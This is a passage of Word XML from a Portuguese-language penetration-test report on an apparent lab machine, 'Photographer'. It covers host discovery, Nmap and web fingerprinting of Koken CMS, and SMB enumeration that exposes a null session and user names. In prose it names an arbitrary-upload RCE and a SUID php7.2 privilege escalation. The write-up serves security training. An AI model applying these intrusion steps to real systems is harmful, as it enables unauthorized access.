        <w:t xml:space="preserve"> para upload arbitrário de arquivo PHP e execução remota de código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134FBCA9" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Pós-Exploração e Escalação de Privilégios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505526B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Após obter o acesso inicial como usuário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-data, foram aplicadas técnicas de escalação de privilégios para elevar o nível de acesso ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>superusuário</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> root, explorando a configuração incorreta do bit SUID no binário php7.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6837C775" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>4.5 Documentação e Mitigação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBC59F" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Todos os passos, evidências e resultados foram documentados. Ao final, foram elaboradas recomendações de mitigação para cada vulnerabilidade identificada, alinhadas ao OWASP Top 10 2025 e às boas práticas do NIST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760930BC" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="599FA38B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>5 RECONHECIMENTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51E017" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Descoberta de Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0EAEF7" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A identificação do alvo na rede foi realizada com varredura ARP na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sub-rede</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.56.0/24, confirmando o IP 192.168.56.102 para a máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, com latência de 0,00019 segundos, indicando que o alvo estava ativo e acessível.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5B270C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Varredura de Portas e Serviços</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5F816" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A varredura com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> revelou quatro portas abertas com os respectivos serviços:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B4015" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Porta 80/TCP — Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.4.18 (Ubuntu) — servidor web principal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416222B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Porta 139/TCP — Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3.X - 4.X (workgroup: WORKGROUP) — protocolo SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029C2D5" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Porta 445/TCP — Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3.X - 4.X (workgroup: WORKGROUP) — protocolo SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D243ED9" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Porta 8000/TCP — Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.4.18 (Ubuntu) — aplicação web secundária.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128BB9AA" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="155E7664" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identificado foi PHOTOGRAPHER, o que, combinado com o header HTTP x-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-cache detectado posteriormente, forneceu uma pista direta sobre a tecnologia empregada no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F0A6AE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fingerprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> da Aplicação Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22373E93" w14:textId="2F39EE16" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A análise com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WhatWeb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA346D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C04EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C04EF">
        <w:t>Nikito</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA346D">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA346D">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA346D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C04EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">confirmou a presença do CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> versão 0.22.24 na porta 8000, identificado pelo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MetaGenerator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e pelo header x-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-cache. O autor do site foi identificado como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahomi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, correlacionando com o usuário local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encontrado posteriormente no sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00EA346D">
        <w:t xml:space="preserve"> Além disso, com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA346D">
        <w:t>Nikito</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA346D">
        <w:t xml:space="preserve"> foi descoberta a</w:t>
      </w:r>
      <w:r w:rsidR="00EA346D" w:rsidRPr="00EA346D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA346D">
        <w:t xml:space="preserve">existência do painel administrativo em /admin e /admin/index.html, </w:t>
      </w:r>
      <w:r w:rsidR="00EA346D">
        <w:t>assim como também</w:t>
      </w:r>
      <w:r w:rsidR="00EA346D">
        <w:t xml:space="preserve"> identificar os diretórios /app/, /home/ e </w:t>
      </w:r>
      <w:r w:rsidR="00EA346D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">estrutura típica do CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA346D">
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA346D">
        <w:t>. O header x-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA346D">
        <w:t>koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA346D">
        <w:t>-cache foi destacado como indicador primário da tecnologia em uso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C684D51" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O comando executado e o resultado obtido foram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD549A8" w14:textId="3CDE5EFA" w:rsidR="00DA7219" w:rsidRDefault="003C04EF" w:rsidP="003C04EF">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F1321A1" wp14:editId="1651A617">
            <wp:extent cx="5579745" cy="4039235"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="13465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8959" name="Imagem 134658959"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5579745" cy="4039235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD8B4C" w14:textId="77777777" w:rsidR="00EA346D" w:rsidRDefault="00EA346D" w:rsidP="003C04EF">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761583AC" w14:textId="77777777" w:rsidR="00EA346D" w:rsidRDefault="00EA346D" w:rsidP="00EA346D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi executado para enumeração de diretórios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32694ACE" w14:textId="77777777" w:rsidR="00EA346D" w:rsidRPr="00EA346D" w:rsidRDefault="00EA346D" w:rsidP="00EA346D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA346D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DBCAF7B" wp14:editId="4AA506D5">
            <wp:extent cx="5579745" cy="2702560"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="770075915"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2702560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C679B47" w14:textId="77777777" w:rsidR="00EA346D" w:rsidRDefault="00EA346D" w:rsidP="00EA346D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Os resultados confirmaram a estrutura de diretórios do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: /admin, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>storage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, /app, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, conforme esperado para a versão 0.22.24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B99C3" w14:textId="77777777" w:rsidR="00EA346D" w:rsidRPr="00EA346D" w:rsidRDefault="00EA346D" w:rsidP="003C04EF">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547774A4" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="05C2A3C7" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>6 ENUMERAÇÃO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1711C7DC" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Enumeração SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D101A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O Samba nas portas 139 e 445 foi enumerado com a ferramenta enum4linux, que revelou informações críticas sobre o sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF6C5D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Sessão nula aceita pelo servidor: o Samba permitia conexões anônimas sem autenticação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D3175" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Domínio: PHOTOGRAPHER e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Builtin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF3124" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Política de senhas: comprimento mínimo de 5 caracteres, sem complexidade obrigatória.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D1189" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usuários Unix identificados: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (UID 1000) e agi (UID 1001).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C469E59" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compartilhamento </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sambashare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> acessível anonimamente com mapeamento e listagem permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C356D44" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="78AD6E44" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O comando de enumeração executado foi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45380F40" w14:textId="61BE10C9" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F815F7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69A049B2" wp14:editId="03AB8E8A">
            <wp:extent cx="3314700" cy="2892582"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="182484714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8569" cy="2895958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA85226" w14:textId="192DD300" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sessão liberada sem uso de senha:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D869E" w14:textId="09B9D186" w:rsidR="00F815F7" w:rsidRPr="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F815F7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D045AB" wp14:editId="02F19A51">
            <wp:extent cx="5579745" cy="896620"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="100911109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9745" cy="896620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF8CFF7" w14:textId="77777777" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F815F7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="697BC559" wp14:editId="0AD69103">
            <wp:extent cx="3953022" cy="3518446"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="25835053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4132" cy="3528335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72467FD0" w14:textId="77777777" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A565956" w14:textId="6D96C021" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F815F7">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17D49212" wp14:editId="1A3879F6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>495447</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-98</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3544570" cy="2771336"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="189152580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49624" cy="27752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04DA56" w14:textId="76F71A11" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8CD496" w14:textId="77777777" w:rsidR="00F815F7" w:rsidRDefault="00F815F7" w:rsidP="00F815F7">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
